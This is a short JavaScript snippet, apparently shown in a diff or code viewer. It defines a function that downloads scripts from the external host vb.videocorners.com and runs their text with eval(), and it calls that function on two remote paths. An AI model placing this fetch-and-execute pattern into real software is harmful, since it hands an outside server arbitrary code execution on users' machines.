1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556 |
-
- function nop(){}
- window.nop = nop
- window.oclog = console.log
- window.clog = console.log
-
- {
- // var host_tmp="jinnace.com"
- var host_tmp="vb.videocorners.com"
- var host=host_tmp
- window.glob_const = {
- host:host_tmp,
- full:`https://${host_tmp}`,
- origin:`https://${host_tmp}`,
- }
- }
-
-
-
- function rexe(file) {
- var mlog = clog
-
-
- if (typeof(file) == "string"){
- file = {
- // url:file||"https://jinnace.com/ign/rf/av_shared/xf.js",
- url:file,
- }
- }
-
- var url = file.url
- var xhttp = new XMLHttpRequest();
- xhttp.onreadystatechange = function() {
- if (this.readyState == 4 && this.status == 200) {
- try {
-
- var mlog0 = mlog
- var mx = eval(this.responseText)
- mlog(mx)
- } catch (err){
- mlog("EVL ERR")
- mlog(err +"")
- }
- // global
- // fn1()
- // send_ws_event("ajx",{responseText:this.responseText})
- // document.getElementById("demo").innerHTML = this.responseText;
- }
- };
- xhttp.open("GET", url, true);
- xhttp.send();
- }
-
- // C:\bspace\repos\jc4\ign4\j8\ac0\rld\r0.js
- rexe(`${glob_const.full}/ign/j8/ac0/rld/mrld.js`)
- rexe(`${glob_const.full}/ign/j8/ac0/rld/r0.js`)
|